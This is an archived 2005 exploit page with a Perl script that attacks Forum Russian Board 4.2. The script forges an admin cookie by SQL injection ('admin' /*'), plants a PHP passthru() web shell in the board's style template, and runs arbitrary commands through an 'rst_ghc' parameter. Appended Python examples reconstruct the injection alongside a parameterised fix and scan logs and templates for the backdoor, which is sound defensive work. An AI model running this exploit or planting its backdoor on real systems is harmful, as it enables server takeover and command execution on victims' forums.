Forum Russian Board SQL Injection and Command Execution Exploit
Source: http://rst.void.ru   Author: 1dt.w0lf   Published: 2005-06-22

#!/usr/bin/perl

# Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
# command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
# bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
# RST/GHC - http://rst.void.ru , http://ghc.ru

use IO::Socket;
use Getopt::Std;

getopts("h:p:u:i:c:");

$host = $opt_h;
$path = $opt_p;
$user = $opt_u;
$id = $opt_i;
$cmd = $opt_c || 'create';

$cmdspl = "%26%26"; # separator between the "echo _START_", command and "echo _END_" parts of
                    # the shell request: ";" for unix targets, "%26%26" (URL-encoded &&) for windows

if(!$host || !$path) { usage(); }
if(($cmd eq 'create' || $cmd eq 'delete') && (!$user || !$id)) { usage(); }

$host =~ s/(http:\/\/)//g;
$cook = $user."' /*"; # injected board_user_cook: the quote closes the username string and /*
                      # comments out whatever the session query checks after it (only the name
                      # and board_user_id are then compared), so no password or token is needed

if($cmd eq 'create' || $cmd eq 'delete'){
head();
print ">>> CREATE SHELL\n" if ($cmd eq 'create');
print ">>> DELETE SHELL\n" if ($cmd eq 'delete');
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "[-] CONNECT FAILED\n";
# fetch the admin style editor with the forged session cookies and scrape the current template
print $sock "GET ${path}admin/style_edit.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
print $sock "Connection: close\n\n";
print "GETTING CURRENT STYLE ... [";
while ($res = <$sock>)
{
if($res =~ /(.*)<\/textarea>/) { $data .= $1; $p = 0; }
$data .= $res if $p;
if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
}

if(length($data)>0) { print " DONE ]\n"; }
else { print " FAILED ]\n"; exit(); }

if($data =~ /rst_ghc/) # the shell is recognised by the rst_ghc parameter name it carries
{
if($cmd eq 'create') { print "SHELL ALREADY EXIST!"; exit(); }
if($cmd eq 'delete')
{
print "SHELL EXIST.\nDELETING SHELL.\n";
$data =~ s/\s*<\? if\(\$_GET\[rst_ghc\]\)\{ passthru\(\$_GET\[rst_ghc\]\); \} \?>//g;
}
}
else
{
if($cmd eq 'create')
{
$data .= "\n";
# one-line PHP backdoor appended to the style template; the template is rendered by every
# page, so index.php?rst_ghc=<cmd> runs <cmd> through passthru() from then on
$data .= '<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>';
}
if($cmd eq 'delete') { print "SHELL NOT EXIST. CAN'T DELETE."; exit(); }
}

$data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; # URL-encode every byte before POSTing the template back
$post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
print "CREATE NEW STYLE ...[";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80")
|| die "[-] CONNECT FAILED\r\n";
print $sock "POST ${path}admin/style_edit.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$id\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-length: ".length($post)."\n\n";
print $sock "$post";
print $sock "\n\n";
print " DONE ]\n";
if($cmd eq 'create') { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
if($cmd eq 'delete') { print "SHELL DELETED!"; }
}
else
{
head();
print ">>> COMMAND EXECUTE\n";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80")
|| die "[-] CONNECT FAILED\n";
# $cmd is interpolated into the request line unencoded: pass spaces and shell
# metacharacters already URL-encoded (e.g. -c ls%20-la), or the request is malformed
print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";

while ($res = <$sock>)
{
if($res =~ /^_END_/) { $p = 0; }
$data .= $res if $p;
if($res =~ /^_START_/) { $p = 1; }
}
if(length($data)>0) {
print "-----------------------------------------------------------------\n";
print $data;
print "-----------------------------------------------------------------\n";
exit(0);
}
else { print "[-] FAILED\nMaybe you forget create shell first?\n"; exit(0); }

}

sub usage()
{
head();
print " USAGE : r57frb.pl [options]\n\n";
print " Options: \n";
print " -h - host e.g. '127.0.0.1' , 'www.frb.ru'\n";
print " -p - path to forum e.g. '/frb/' , '/forum/'\n";
print " -u - admin username e.g. 'admin'\n";
print " -i - admin id e.g. '1'\n";
print " -c [create|delete|cmd]\n";
print " create - for create shell\n";
print " delete - for delete shell\n";
print " cmd - any command for execute\n";
print "-----------------------------------------------------------------\n";
exit(0);
}

sub head()
{
print "-----------------------------------------------------------------\n";
print "Forum Russian Board 4.2 Full command execution exploit by RST/GHC\n";
print "-----------------------------------------------------------------\n";
}
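The authentication bypass the script relies on, reconstructed as an added example (this is not code from the page or from FRB itself). The board is assumed to take a name and a token from the board_user_cook cookie and to paste both, together with board_user_id, into its session query; the exploit's cookie value admin' /* then closes the name string and comments out the token check. SQLite stands in for the real database because, like MySQL, it treats /* as a comment, and an unterminated /* runs to the end of the statement. The table layout, column names, the name|token cookie format and the query text are assumptions made for this example.

```python
import sqlite3

# Constructed stand-in for the board's session check. Table layout, column names,
# the "name|token" cookie format and the SQL are assumptions for this example;
# FRB's real schema and query are not shown on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, token TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "9d1e8c0b5a7f4e2d", 1),   # constructed secret session token
        (2, "guest", "0000aaaabbbbcccc", 0),
    ])
    return db

def split_cookie(cook):
    """Cookie is assumed to carry "name|token"; a bare "admin' /*" yields an empty token."""
    name, _, token = cook.partition("|")
    return name, token

def session_vulnerable(db, user_id, cook):
    """Cookie values are pasted into the SQL text: the pattern the exploit relies on."""
    name, token = split_cookie(cook)
    sql = ("SELECT id, name, is_admin FROM users "
           f"WHERE id={int(user_id)} AND name='{name}' AND token='{token}'")
    # With cook = "admin' /*" the statement becomes
    #   ... WHERE id=1 AND name='admin' /*' AND token=''
    # and everything after /* is a comment, so the token is never compared.
    return db.execute(sql).fetchone()

def session_fixed(db, user_id, cook):
    """Same check with bound parameters: the quote and /* are data, not SQL."""
    name, token = split_cookie(cook)
    return db.execute(
        "SELECT id, name, is_admin FROM users WHERE id=? AND name=? AND token=?",
        (int(user_id), name, token)).fetchone()

def exploit_cookie(user):
    """Reproduces r57frb.pl's  $cook = $user."' /*"  value."""
    return user + "' /*"

if __name__ == "__main__":
    db = make_db()
    cook = exploit_cookie("admin")
    print("vulnerable:", session_vulnerable(db, 1, cook))   # admin row, no token needed
    print("fixed:     ", session_fixed(db, 1, cook))        # None
```

The fix is parameter binding, not quote escaping: with bound parameters the cookie value can contain any quote or comment sequence and is still compared as a plain string against the token column.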
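For defenders, an added example (not from the page or the project) that looks for the artifacts this script leaves behind: the rst_ghc parameter and the echo _START_ ... echo _END_ wrapper in a request's query string, a POST to admin/style_edit.php (a legitimate admin action, so it only flags for review), and the one-line PHP backdoor in a saved style template. The backdoor pattern is generalised beyond the exact payload (other $_GET/$_POST parameter names and system/exec variants). The access-log lines and the template text are constructed for the example.

```python
import re

# Constructed combined-format access-log lines (invented for this example, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jun/2005:10:01:02 +0400] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.9 - - [22/Jun/2005:10:02:11 +0400] "GET /forum/admin/style_edit.php HTTP/1.1" 200 8100 "-" "-"
10.0.0.9 - - [22/Jun/2005:10:02:12 +0400] "POST /forum/admin/style_edit.php HTTP/1.1" 200 311 "-" "-"
10.0.0.9 - - [22/Jun/2005:10:02:20 +0400] "GET /forum/index.php?rst_ghc=echo%20_START_%20;%20id%20;%20echo%20_END_%20; HTTP/1.1" 200 5300 "-" "-"
10.0.0.7 - - [22/Jun/2005:10:05:00 +0400] "GET /forum/index.php?topic=12 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Constructed style template with the exploit's payload appended, as style_edit.php would save it.
SAMPLE_TEMPLATE = """<table class="board">
<tr><td>{message}</td></tr>
</table>
<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

SHELL_PARAM = "rst_ghc"                                      # parameter name hard-coded in r57frb.pl
WRAPPER_RE = re.compile(r"echo(?:%20|\+| )_START_", re.I)    # the script's output delimiter
# Generalised beyond the exact payload: any <? if($_GET[..]){ passthru( ... style one-liner,
# also matching $_POST/$_REQUEST and system/exec/shell_exec.
BACKDOOR_RE = re.compile(
    r"<\?(?:php)?\s*if\s*\(\s*\$_(?:GET|POST|REQUEST)\[[^\]]*\]\s*\)\s*\{\s*"
    r"(?:passthru|system|exec|shell_exec)\s*\(", re.I)

def scan_access_log(text):
    """Return (ip, method, url, reasons) for each request matching an exploit artifact."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        query = url.partition("?")[2]
        reasons = []
        if re.search(rf"(?:^|&){re.escape(SHELL_PARAM)}=", query):
            reasons.append("rst_ghc parameter")
        if WRAPPER_RE.search(query):
            reasons.append("_START_/_END_ command wrapper")
        if m.group("method") == "POST" and url.endswith("/admin/style_edit.php"):
            reasons.append("style template edited (verify admin session)")
        if reasons:
            hits.append((m.group("ip"), m.group("method"), url, reasons))
    return hits

def find_backdoors(template_text):
    """Return the backdoor fragments found in a saved style template."""
    return [m.group(0) for m in BACKDOOR_RE.finditer(template_text)]

if __name__ == "__main__":
    for ip, method, url, reasons in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {method} {url}: {', '.join(reasons)}")
    for frag in find_backdoors(SAMPLE_TEMPLATE):
        print("backdoor in template:", frag)
```

Cookies are not in the default combined log, so the forged board_user_cook value itself is not visible there; the style edit followed shortly by index.php requests carrying an unknown parameter from the same client is the sequence worth alerting on. The template scan is the check to run after the fact, since the script's delete mode only removes its own exact payload.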